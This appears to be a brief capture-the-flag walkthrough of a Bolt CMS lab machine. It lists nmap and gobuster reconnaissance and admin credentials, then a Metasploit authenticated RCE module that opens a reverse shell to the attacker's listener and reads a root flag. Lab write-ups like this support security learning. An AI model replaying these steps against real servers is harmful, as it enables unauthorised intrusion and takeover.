[Bolt]
[Remote code execution]
[Nmap]
nmap -sV -sC <ip> -T 4
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; proto
[NSE]
nmap --script=http-enum.nse 10.10.182.7:8000
[CMS Port]
8000
[Creds]
username: bolt
pass:boltadmin123
[Gobuster]
gobuster dir -u http://10.10.179.194/ -w /media/kali/save/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.182.7:8000/
[+] Threads:        40
[+] Wordlist:       /media/kali/save/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/04 07:26:03 Starting gobuster
===============================================================
/search (Status: 200)
/pages (Status: 200)
/entries (Status: 200)
/showcases (Status: 200)

[Metasploit]
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set LHOST tun0 
LHOST => 10.4.30.186
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS 10.10.182.7
RHOSTS => 10.10.182.7
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RPORT 8000
RPORT => 8000
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt
USERNAME => bolt
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set PASSWORD boltadmin123
PASSWORD => boltadmin123
msf6 exploit(unix/webapp/bolt_authenticated_rce) > run

[*] Started reverse TCP handler on 10.4.30.186:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "xmuc".
[*] Found 2 potential token(s) for creating .php files.
[+] Deleted file sidcbiitpjqx.php.
[+] Used token 55527123b769e84b71b5346db8 to create yvuzfokc.php.
[*] Attempting to execute the payload via "/files/yvuzfokc.php?xmuc=`payload`"
[*] Command shell session 1 opened (10.4.30.186:4444 -> 10.10.182.7:43588) at 2021-03-04 07:40:23 +0000
[!] No response, may have executed a blocking payload!
[+] Deleted file yvuzfokc.php.
[+] Reverted user profile back to original state.
[Shell]
whoami
root
cd /home
cat flag.txt 
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
